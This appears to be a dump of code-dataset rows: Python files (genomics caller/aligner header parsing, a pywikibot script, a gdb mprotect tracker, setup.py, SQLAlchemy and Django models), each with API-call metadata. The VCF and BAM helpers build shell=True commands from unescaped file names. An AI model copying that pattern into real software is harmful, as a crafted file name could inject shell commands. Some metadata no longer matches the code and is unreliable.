{}), '(atlas)\n', (16882, 16889), False, 'from nilearn._utils import check_niimg_3d\n'), ((17030, 17056), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (17048, 17056), False, 'from abagen import datasets, io, process, utils\n'), ((17181, 17211), 'abagen.utils.get_unique_labels', 'utils.get_unique_labels', (['atlas'], {}), '(atlas)\n', (17204, 17211), False, 'from abagen import datasets, io, process, utils\n'), ((17673, 17741), 'abagen.process.filter_probes', 'process.filter_probes', (['files.pacall', 'probes'], {'threshold': 'ibf_threshold'}), '(files.pacall, probes, threshold=ibf_threshold)\n', (17694, 17741), False, 'from abagen import datasets, io, process, utils\n'), ((17790, 17859), 'abagen.process.get_stable_probes', 'process.get_stable_probes', (['files.microarray', 'files.annotation', 'probes'], {}), '(files.microarray, files.annotation, probes)\n', (17815, 17859), False, 'from abagen import datasets, io, process, utils\n'), ((3239, 3280), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['sample', 'centroids'], {}), '(sample, centroids)\n', (3261, 3280), False, 'from abagen import datasets, io, process, utils\n'), ((6657, 6698), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (6679, 6698), False, 'from abagen import datasets, io, process, utils\n'), ((7130, 7161), 'numpy.where', 'np.where', (['(labelled_samples == 0)'], {}), '(labelled_samples == 0)\n', (7138, 7161), True, 'import numpy as np\n'), ((8858, 8893), 'numpy.setdiff1d', 'np.setdiff1d', (['labels', 'sample_labels'], {}), '(labels, sample_labels)\n', (8870, 8893), True, 'import numpy as np\n'), ((16942, 16983), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (16964, 16983), False, 'from abagen import datasets, io, process, utils\n'), ((17250, 17295), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas'], 
{'labels': 'all_labels'}), '(atlas, labels=all_labels)\n', (17269, 17295), False, 'from abagen import datasets, io, process, utils\n'), ((17558, 17600), 'abagen.process.reannotate_probes', 'process.reannotate_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17583, 17600), False, 'from abagen import datasets, io, process, utils\n'), ((17628, 17659), 'abagen.io.read_probes', 'io.read_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17642, 17659), False, 'from abagen import datasets, io, process, utils\n'), ((18195, 18299), 'abagen.process.drop_mismatch_samples', 'process.drop_mismatch_samples', (['files.annotation[subj]', 'files.ontology[subj]'], {'corrected': 'corrected_mni'}), '(files.annotation[subj], files.ontology[subj],\n corrected=corrected_mni)\n', (18224, 18299), False, 'from abagen import datasets, io, process, utils\n'), ((18490, 18532), 'abagen.io.read_microarray', 'io.read_microarray', (['files.microarray[subj]'], {}), '(files.microarray[subj])\n', (18508, 18532), False, 'from abagen import datasets, io, process, utils\n'), ((19106, 19150), 'numpy.unique', 'np.unique', (['sample_labels'], {'return_counts': '(True)'}), '(sample_labels, return_counts=True)\n', (19115, 19150), True, 'import numpy as np\n'), ((20609, 20640), 'abagen.process.normalize_expression', 'process.normalize_expression', (['e'], {}), '(e)\n', (20637, 20640), False, 'from abagen import datasets, io, process, utils\n'), ((20709, 20753), 'abagen.process.aggregate_donors', 'process.aggregate_donors', (['expression', 'metric'], {}), '(expression, metric)\n', (20733, 20753), False, 'from abagen import datasets, io, process, utils\n'), ((1553, 1574), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (1567, 1574), False, 'from nilearn._utils import check_niimg_3d\n'), ((4221, 4268), 'numpy.all', 'np.all', (['(sample_info.values == atlas_info.values)'], {}), '(sample_info.values == atlas_info.values)\n', (4227, 4268), True, 'import numpy as 
np\n'), ((18034, 18060), 'numpy.append', 'np.append', (['[0]', 'all_labels'], {}), '([0], all_labels)\n', (18043, 18060), True, 'import numpy as np\n'), ((19459, 19530), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'atlas.affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], atlas.affine)\n", (19475, 19530), False, 'from abagen import datasets, io, process, utils\n'), ((19644, 19710), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['coords', 'centroids[empty]'], {'return_dist': '(True)'}), '(coords, centroids[empty], return_dist=True)\n', (19666, 19710), False, 'from abagen import datasets, io, process, utils\n'), ((19894, 19924), 'pandas.Series', 'pd.Series', (['empty'], {'name': '"""label"""'}), "(empty, name='label')\n", (19903, 19924), True, 'import pandas as pd\n'), ((8988, 9020), 'pandas.Series', 'pd.Series', (['missing'], {'name': '"""label"""'}), "(missing, name='label')\n", (8997, 9020), True, 'import pandas as pd\n'), ((19590, 19615), 'numpy.in1d', 'np.in1d', (['all_labels', 'labs'], {}), '(all_labels, labs)\n', (19597, 19615), True, 'import numpy as np\n'), ((1842, 1863), 'scipy.spatial.distance.cdist', 'cdist', (['sample', 'coords'], {}), '(sample, coords)\n', (1847, 1863), False, 'from scipy.spatial.distance import cdist\n'), ((19975, 19988), 'numpy.diag', 'np.diag', (['dist'], {}), '(dist)\n', (19982, 19988), True, 'import numpy as np\n')]
|
# coding=utf-8
#
# Copyright (c) 2010-2015 Illumina, Inc.
# All rights reserved.
#
# This file is distributed under the simplified BSD license.
# The full text can be found here (and in LICENSE.txt in the root folder of
# this distribution):
#
# https://github.com/sequencing/licenses/blob/master/Simplified-BSD-License.txt
import tempfile
import itertools
import subprocess
import logging
import os
import json
class CallerInfo(object):
    """ Class for collecting caller info and version

    Caller / aligner records are stored as three-element lists:
    [name, version, parameters]
    """

    def __init__(self):
        # callers and aligners are stored in tuples of three:
        # (caller/aligner, version, parameters)
        self.callers = []
        self.aligners = []

    def __repr__(self):
        return "aligners=[" + ",".join(["/".join(xx) for xx in self.aligners]) + "] " + \
               "callers=[" + ",".join(["/".join(xx) for xx in self.callers]) + "]"

    def asDict(self):
        """ Return caller / aligner information as a JSON-compatible dict. """
        kvd = ["name", "version", "parameters"]
        return {"aligners": [dict(y for y in zip(kvd, x)) for x in self.aligners],
                "callers": [dict(y for y in zip(kvd, x)) for x in self.callers]}

    @staticmethod
    def _field_value(hf):
        """ Content of a VCF header field: prefer 'values', fall back to 'value'. """
        try:
            return str(hf["values"])
        except Exception:
            return hf["value"]

    @staticmethod
    def _parse_command_line(hf, prefix):
        """ Parse a *CommandLine header record into (name, version, options).

        Missing sub-fields degrade gracefully to 'unknown' / ''.
        """
        caller = prefix
        try:
            caller += "-" + hf["values"]["ID"]
        except Exception:
            pass
        version = "unknown"
        try:
            version = hf["values"]["Version"]
        except Exception:
            pass
        options = ""
        try:
            options = hf["values"]["CommandLineOptions"]
        except Exception:
            pass
        return caller, version, options

    def addVCF(self, vcfname):
        """ Add caller versions from a VCF header

        :param vcfname: VCF file name
        """
        tf = tempfile.NamedTemporaryFile(delete=False)
        tf.close()
        vfh = {}
        try:
            sp = subprocess.Popen("vcfhdr2json '%s' '%s'" % (vcfname, tf.name),
                                  shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            o, e = sp.communicate()
            if sp.returncode != 0:
                raise Exception("vcfhdr2json call failed: %s / %s" % (o, e))
            # close the handle deterministically (previously leaked)
            with open(tf.name) as jf:
                vfh = json.load(jf)
        finally:
            try:
                os.unlink(tf.name)
            except OSError:
                pass

        # accumulate generic "source" information into a single record
        cp = ['unknown', 'unknown', '']
        gatk_callers = ["haplotypecaller", "unifiedgenotyper", "mutect"]
        sent_callers = ["haplotyper"]
        source_found = False
        for hf in vfh["fields"]:
            try:
                k = hf["key"]
                if k == "source":
                    cp[0] = self._field_value(hf)
                    # Platypus encodes its version in the source field
                    if cp[0].startswith("Platypus_Version_"):
                        cp[1] = cp[0][len("Platypus_Version_"):]
                        cp[0] = "Platypus"
                    source_found = True
                elif k == "source_version":
                    cp[1] = self._field_value(hf)
                    source_found = True
                elif k == "cmdline":
                    cp[2] = self._field_value(hf)
                    source_found = True
                elif k == "platypusOptions":
                    cp[2] = self._field_value(hf)
                    source_found = True
                elif k == "octopus":
                    # octopus doesn't add a version
                    self.callers.append(["octopus", "unknown", str(hf["values"])])
                elif k.startswith("GATKCommandLine"):
                    caller, version, options = self._parse_command_line(hf, "GATK")
                    if any(g in caller.lower() for g in gatk_callers):
                        self.callers.append([caller, version, options])
                elif k.startswith("SentieonCommandLine"):
                    caller, version, options = self._parse_command_line(hf, "Sentieon")
                    if any(s in caller.lower() for s in sent_callers):
                        # BUGFIX: record the full [name, version, parameters]
                        # triple like every other caller entry; previously the
                        # parameters slot was dropped and CommandLineOptions
                        # was never read for Sentieon records.
                        self.callers.append([caller, version, options])
            except Exception:
                # malformed header records are ignored (best-effort parsing)
                pass
        if source_found:
            self.callers.append(cp)

    def addBAM(self, bamfile):
        """ Extract aligner information from a BAM file

        :param bamfile: name of BAM file
        """
        sp = subprocess.Popen("samtools view -H '%s'" % bamfile,
                              shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        o, e = sp.communicate()
        if sp.returncode != 0:
            raise Exception("Samtools call failed: %s / %s" % (o, e))
        # BUGFIX: communicate() returns bytes on Python 3; decode before
        # doing any string processing on the header text
        if isinstance(o, bytes):
            o = o.decode("utf-8", "replace")
        for line in o.split("\n"):
            if not line.startswith("@PG"):
                continue
            try:
                # noinspection PyTypeChecker
                x = dict(y.split(":", 1) for y in line.split("\t")[1:])
            except Exception:
                logging.warning("Unable to parse SAM/BAM header line: %s" % line)
                continue
            cp = ['unknown', 'unknown', '']
            try:
                cp[0] = x['PN']
            except KeyError:
                try:
                    # fall back to ID, stripping any "-suffix" gdb appends
                    cp[0] = x['ID']
                    if "-" in cp[0]:
                        cp[0] = cp[0].split("-")[0]
                except KeyError:
                    pass
            try:
                cp[1] = x['VN']
            except KeyError:
                pass
            try:
                cp[2] = x['CL']
            except KeyError:
                pass
            self.aligners.append(cp)
|
[
"logging.warn",
"tempfile.NamedTemporaryFile",
"subprocess.Popen",
"os.unlink"
] |
[((1261, 1302), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (1288, 1302), False, 'import tempfile\n'), ((4904, 5020), 'subprocess.Popen', 'subprocess.Popen', (['("samtools view -H \'%s\'" % bamfile)'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '("samtools view -H \'%s\'" % bamfile, shell=True, stdout=\n subprocess.PIPE, stderr=subprocess.PIPE)\n', (4920, 5020), False, 'import subprocess\n'), ((1369, 1495), 'subprocess.Popen', 'subprocess.Popen', (['("vcfhdr2json \'%s\' \'%s\'" % (vcfname, tf.name))'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '("vcfhdr2json \'%s\' \'%s\'" % (vcfname, tf.name), shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n', (1385, 1495), False, 'import subprocess\n'), ((1751, 1769), 'os.unlink', 'os.unlink', (['tf.name'], {}), '(tf.name)\n', (1760, 1769), False, 'import os\n'), ((5454, 5516), 'logging.warn', 'logging.warn', (["('Unable to parse SAM/BAM header line: %s' % line)"], {}), "('Unable to parse SAM/BAM header line: %s' % line)\n", (5466, 5516), False, 'import logging\n')]
|
#!/usr/local/bin/python3
import common
import pywikibot
import wikitextparser as parser
from pywikibot import pagegenerators
# Wikidata property ID, presumably the "game mode" property; unused in this
# script as written -- TODO confirm before removing
GAME_MODE_PROP_ID = 'P404'
# Title (without namespace) of the infobox template whose transclusions we scan
TEMPLATE = 'Infobox video game'
def main():
    """Scan up to 100 mainspace pages transcluding the infobox template."""
    site = pywikibot.Site('en', 'wikipedia')
    # NOTE(review): `repo` and `summary` are never used below -- kept so
    # behavior (including the data_repository() call) is unchanged
    repo = site.data_repository()
    template_page = pywikibot.Page(site, TEMPLATE, ns=10)
    summary = '([[Wikidata:Requests for permissions/Bot/AmmarBot $|Add maximum capacity]])'
    # all mainspace pages referencing the template, capped at 100
    pages = template_page.getReferences(follow_redirects=False,
                                        only_template_inclusion=False,
                                        namespaces=[0],
                                        total=100)
    processPages(pages, template_page)
def processPages(pages, temp):
    """Run extractMode over every page in `pages`.

    Redirect titles pointing at `temp` are collected (lower-cased, without
    namespace) so transclusions via a redirect are recognised too.
    """
    redirect_titles = [link.title(with_ns=False).lower()
                       for link in temp.backlinks(filter_redirects=True)]
    for page in pages:
        extractMode(page, redirect_titles)
def extractMode(page, redirects):
    """Print the 'game_mode' parameter of the target infobox on *page*.

    :param page: pywikibot.Page to inspect
    :param redirects: lower-cased, namespace-less titles of redirects to
        the target template, as built by processPages()
    """
    # raw_extracted_templates yields (template, parameters) pairs
    templates = page.raw_extracted_templates
    for (template, values) in templates:
        # NOTE(review): if `template` is a plain string here, .title() is
        # str.title() (word capitalisation), which would never equal
        # 'Infobox video game' nor the lower-cased redirect titles --
        # confirm the element type against the pywikibot version in use
        if template.title() == TEMPLATE or template.title() in redirects:
            print(values.get('game_mode'))
# Script entry point
if __name__ == '__main__':
    main()
|
[
"pywikibot.Site",
"pywikibot.Page"
] |
[((210, 243), 'pywikibot.Site', 'pywikibot.Site', (['"""en"""', '"""wikipedia"""'], {}), "('en', 'wikipedia')\n", (224, 243), False, 'import pywikibot\n'), ((289, 326), 'pywikibot.Page', 'pywikibot.Page', (['site', 'TEMPLATE'], {'ns': '(10)'}), '(site, TEMPLATE, ns=10)\n', (303, 326), False, 'import pywikibot\n')]
|
import gdb
import math
import tempfile
class myst_mprotect_tracker(gdb.Breakpoint):
    """GDB breakpoint on _mprotect that records every call's arguments.

    Recorded calls can later be queried through the `myst-prot` user
    command (wired up via `do_command`) to find which mprotect call(s)
    covered a given address.
    """

    def __init__(self):
        # Alternative breakpoint locations kept from earlier experiments:
        #super(myst_mprotect_tracker, self).__init__('myst_mprotect_ocall', internal=True)
        #self.bp = gdb.Breakpoint.__init__(self,'exec.c:637', internal=True)
        #self.bp = gdb.Breakpoint.__init__(self,'_mprotect', internal=True)
        super(myst_mprotect_tracker, self).__init__('_mprotect', internal=False)
        # each entry: (addr, length, prot, backtrace-or-None, thread)
        self.calls = []
        # (frames, start_index, end_index) controlling backtrace capture
        self.bt_spec = []
        # 1-based call indices at which stop() should actually halt
        self.breaks = []

    def stop(self):
        """Invoked by gdb on each hit; return True to halt the inferior."""
        # read the _mprotect arguments out of the current frame
        addr = int(gdb.parse_and_eval('(uint64_t)addr'))
        length = int(gdb.parse_and_eval('(uint64_t)len'))
        prot = int(gdb.parse_and_eval('(int)prot'))
        thread = int(gdb.parse_and_eval('$_thread'))
        bt = None
        # 1-based index of this call in the recorded sequence
        index = len(self.calls) + 1
        if self.bt_spec:
            frames = self.bt_spec[0]
            start_index = self.bt_spec[1]
            end_index = self.bt_spec[2]
            # only capture a backtrace for calls inside the configured window
            if index >= start_index and index <= end_index:
                bt = gdb.execute('bt %d' % frames, False, True)
        self.calls.append((addr, length, prot, bt, thread))
        if index in self.breaks:
            print("myst-prot: breaking at call %d" % index)
            return True
        return False

    def do_command(self, arg0, *args):
        """Dispatch for the `myst-prot` gdb user command (see `command`)."""
        if arg0 == "-bt":
            self.set_bt_spec(*args)
        elif arg0 == "-b":
            self.add_breaks(*args)
        else:
            self.get_prot(arg0, *args)

    def set_bt_spec(self, frames=1000, start_index=1, end_index=pow(2,32)):
        # remember how many frames to show and for which call-index window
        self.bt_spec = (frames, start_index, end_index)

    def add_breaks(self, *args):
        # register 1-based call indices at which stop() should halt
        for a in args:
            self.breaks.append(int(a))

    def get_prot(self, addr_str, get_all=None):
        """Report the most recent (or, with get_all, every) recorded
        mprotect call covering the address `addr_str` evaluates to."""
        addr = int(gdb.parse_and_eval(addr_str))
        print('address %s = 0x%x' % (addr_str, addr))
        index = len(self.calls) + 1
        # walk calls newest-first so the most recent match prints first
        for c in reversed(self.calls):
            index -= 1
            start = c[0]
            length = c[1]
            end = start + length
            # round the end up to a page boundary (4 KiB pages assumed)
            end = math.ceil(end/4096) * 4096
            prot = c[2]
            bt = c[3]
            thread = c[4]
            if addr >= start and addr < end:
                print('matching mprotect call %d : thread %d, start=0x%x, adjusted end=0x%x, prot=%d, length = %d' %
                      (index, thread, start, end, prot, length))
                if bt:
                    print(bt)
                if not get_all:
                    break
mprotect_tracker = None
command = """
define myst-prot
if $argc == 4
python mprotect_tracker.do_command("$arg0", $arg1, $arg2, $arg3)
end
if $argc == 3
python mprotect_tracker.do_command("$arg0", $arg1, $arg2)
end
if $argc == 2
python mprotect_tracker.do_command("$arg0", $arg1)
end
if $argc == 1
python mprotect_tracker.do_command("$arg0")
end
end
"""
def exit_handler(event):
    """Drop the tracker when the inferior exits so stale breakpoint state
    is not reused across runs."""
    global mprotect_tracker
    mprotect_tracker = None


# BUGFIX: exit_handler must be defined before it is passed to
# gdb.events.exited.connect(); previously it was defined *after* this
# guard, raising NameError whenever the file was sourced as a script.
if __name__ == "__main__":
    gdb.events.exited.connect(exit_handler)
    mprotect_tracker = myst_mprotect_tracker()
    # register the `myst-prot` user command by sourcing the `define` text
    with tempfile.NamedTemporaryFile('w') as f:
        f.write(command)
        f.flush()
        gdb.execute('source %s' % f.name)
|
[
"tempfile.NamedTemporaryFile",
"gdb.execute",
"math.ceil",
"gdb.events.exited.connect",
"gdb.parse_and_eval"
] |
[((2936, 2975), 'gdb.events.exited.connect', 'gdb.events.exited.connect', (['exit_handler'], {}), '(exit_handler)\n', (2961, 2975), False, 'import gdb\n'), ((3034, 3066), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (3061, 3066), False, 'import tempfile\n'), ((3124, 3157), 'gdb.execute', 'gdb.execute', (["('source %s' % f.name)"], {}), "('source %s' % f.name)\n", (3135, 3157), False, 'import gdb\n'), ((549, 585), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""(uint64_t)addr"""'], {}), "('(uint64_t)addr')\n", (567, 585), False, 'import gdb\n'), ((608, 643), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""(uint64_t)len"""'], {}), "('(uint64_t)len')\n", (626, 643), False, 'import gdb\n'), ((664, 695), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""(int)prot"""'], {}), "('(int)prot')\n", (682, 695), False, 'import gdb\n'), ((718, 748), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""$_thread"""'], {}), "('$_thread')\n", (736, 748), False, 'import gdb\n'), ((1787, 1815), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['addr_str'], {}), '(addr_str)\n', (1805, 1815), False, 'import gdb\n'), ((1030, 1072), 'gdb.execute', 'gdb.execute', (["('bt %d' % frames)", '(False)', '(True)'], {}), "('bt %d' % frames, False, True)\n", (1041, 1072), False, 'import gdb\n'), ((2071, 2092), 'math.ceil', 'math.ceil', (['(end / 4096)'], {}), '(end / 4096)\n', (2080, 2092), False, 'import math\n')]
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from sample.version import __version__
# Read the long description shown on PyPI.
with open('README.rst') as f:
    readme = f.read()

# Renamed from `license` to avoid shadowing the `license` builtin.
with open('LICENSE') as f:
    license_text = f.read()

# One requirement specifier per line.
with open('requirements.txt') as f:
    required = f.read().splitlines()

setup(
    name='sample',
    version=__version__,
    description='Sample package',
    long_description=readme,
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/azafred/sample',
    license=license_text,
    packages=find_packages(exclude=('tests', 'docs')),
    install_requires=required,
    tests_require=['nose', 'testfixtures', 'mock'],
    test_suite="nose.collector",
    entry_points={
        'console_scripts': [
            'sample = sample.main:main'
        ]
    },
    classifiers=[
        'Topic :: Utilities',
        'Programming Language :: Python',
        'Operating System :: MacOS'
    ]
)
|
[
"setuptools.find_packages"
] |
[((528, 568), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests', 'docs')"}), "(exclude=('tests', 'docs'))\n", (541, 568), False, 'from setuptools import setup, find_packages\n')]
|
# -*- coding: utf-8 -*-
"""
存储结果
"""
from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text
from sqlalchemy.dialects.postgresql import JSONB
from webs.api.models import db
class Result(db.Model):
    """Scan result for a single URL processed within a subtask."""
    __tablename__ = 'results'
    id = Column(BigInteger, primary_key=True, autoincrement=True)
    subtask_id = Column(Integer, nullable=False, index=True)  # id of the parent subtask
    url_id = Column(Integer, nullable=False, index=True)  # id of the URL record
    url_address = Column(String(1024), nullable=False)  # URL address
    http_code = Column(Integer)  # HTTP status code of the site
    title = Column(Text)  # page title
    content = Column(Text)  # page content
    text = Column(Text)  # extracted page body text
    current_url = Column(String(1024))  # final URL the site responded from (after redirects)
    redirect_chain = Column(JSONB)  # chain of redirect links
    response_headers = Column(JSONB)  # response headers
    har_uuid = Column(String(128))  # id of the recorded site interaction (HAR)
    screenshot_id = Column(String(128))  # screenshot id
    cookies = Column(JSONB)  # cookies
    finished_at = Column(TIMESTAMP)  # completion time
    wappalyzer_results = Column(JSONB)  # site fingerprinting results
    callback_failure_msg = Column(Text)  # callback error message
    favicon_md5 = Column(String(50))  # hash (md5) of the site favicon
    favicon_link = Column(String(1024))  # link to the site favicon
    response_time = Column(Integer)  # site response time
    load_complete_time = Column(Integer)  # time until page load completed
    charset = Column(String(256))  # site character encoding
    create_time = Column(TIMESTAMP, server_default=func.now(), index=True)
    update_time = Column(TIMESTAMP, server_default=func.now(), onupdate=func.now(), index=True)
    def __repr__(self):
        return f'<Result-{self.id}>'
    def as_dict(self):
        """Serialize this row (plus its task context) into a plain dict."""
        # local import to avoid a circular import at module load time
        from webs.api.models.db_proxy import task_model_proxy
        task_obj = task_model_proxy.query_task_obj_by_subtask(self.subtask_id)
        return {
            'result_id': self.id,
            'subtask_id': self.subtask_id,
            'task_id': task_obj.id if task_obj else None,
            'customer_id': task_obj.customer_id if task_obj else None,
            'url_id': self.url_id,
            'url_address': self.url_address,
            'http_code': self.http_code,
            'title': self.title,
            'content': self.content,
            'text': self.text,
            'current_url': self.current_url,
            'redirect_chain': self.redirect_chain,
            'response_headers': self.response_headers,
            'har_uuid': self.har_uuid,
            'screenshot_id': self.screenshot_id,
            'cookies': self.cookies,
            'favicon_md5': self.favicon_md5,
            'favicon_link': self.favicon_link,
            'wappalyzer_results': self.wappalyzer_results,
            'response_time': self.response_time,
            'load_complete_time': self.load_complete_time,
            'charset': self.charset,
            # NOTE(review): raises AttributeError if finished_at is NULL — confirm
            # callers only serialize finished results.
            'finished_at': self.finished_at.strftime("%Y-%m-%d %H:%M:%S")
        }
|
[
"sqlalchemy.String",
"sqlalchemy.func.now",
"webs.api.models.db_proxy.task_model_proxy.query_task_obj_by_subtask",
"sqlalchemy.Column"
] |
[((268, 324), 'sqlalchemy.Column', 'Column', (['BigInteger'], {'primary_key': '(True)', 'autoincrement': '(True)'}), '(BigInteger, primary_key=True, autoincrement=True)\n', (274, 324), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((342, 385), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)', 'index': '(True)'}), '(Integer, nullable=False, index=True)\n', (348, 385), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((412, 455), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)', 'index': '(True)'}), '(Integer, nullable=False, index=True)\n', (418, 455), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((547, 562), 'sqlalchemy.Column', 'Column', (['Integer'], {}), '(Integer)\n', (553, 562), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((584, 596), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (590, 596), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((619, 631), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (625, 631), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((651, 663), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (657, 663), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((745, 758), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (751, 758), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((791, 804), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (797, 804), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((932, 945), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (938, 945), False, 'from sqlalchemy import Column, 
BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((975, 992), 'sqlalchemy.Column', 'Column', (['TIMESTAMP'], {}), '(TIMESTAMP)\n', (981, 992), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1026, 1039), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (1032, 1039), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1075, 1087), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (1081, 1087), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1218, 1233), 'sqlalchemy.Column', 'Column', (['Integer'], {}), '(Integer)\n', (1224, 1233), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1269, 1284), 'sqlalchemy.Column', 'Column', (['Integer'], {}), '(Integer)\n', (1275, 1284), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((491, 503), 'sqlalchemy.String', 'String', (['(1024)'], {}), '(1024)\n', (497, 503), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((697, 709), 'sqlalchemy.String', 'String', (['(1024)'], {}), '(1024)\n', (703, 709), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((847, 858), 'sqlalchemy.String', 'String', (['(128)'], {}), '(128)\n', (853, 858), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((897, 908), 'sqlalchemy.String', 'String', (['(128)'], {}), '(128)\n', (903, 908), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1123, 1133), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (1129, 1133), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1174, 1186), 'sqlalchemy.String', 'String', (['(1024)'], {}), '(1024)\n', (1180, 1186), False, 'from 
sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1318, 1329), 'sqlalchemy.String', 'String', (['(256)'], {}), '(256)\n', (1324, 1329), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1678, 1737), 'webs.api.models.db_proxy.task_model_proxy.query_task_obj_by_subtask', 'task_model_proxy.query_task_obj_by_subtask', (['self.subtask_id'], {}), '(self.subtask_id)\n', (1720, 1737), False, 'from webs.api.models.db_proxy import task_model_proxy\n'), ((1391, 1401), 'sqlalchemy.func.now', 'func.now', ([], {}), '()\n', (1399, 1401), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1466, 1476), 'sqlalchemy.func.now', 'func.now', ([], {}), '()\n', (1474, 1476), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1487, 1497), 'sqlalchemy.func.now', 'func.now', ([], {}), '()\n', (1495, 1497), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n')]
|
# Generated by Django 3.0.7 on 2021-02-05 09:15
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the ``Log`` model."""
    dependencies = [
        ('panel', '0003_auto_20210205_0955'),
    ]
    operations = [
        migrations.CreateModel(
            name='Log',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # short status string, at most 4 characters
                ('status', models.CharField(max_length=4)),
                # defaults to the current time when the row is created
                ('time', models.DateTimeField(default=django.utils.timezone.now)),
                # log rows are deleted together with their monitored object
                ('monitor_object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='panel.MonitorObject')),
            ],
        ),
    ]
|
[
"django.db.models.CharField",
"django.db.models.DateTimeField",
"django.db.models.ForeignKey",
"django.db.models.AutoField"
] |
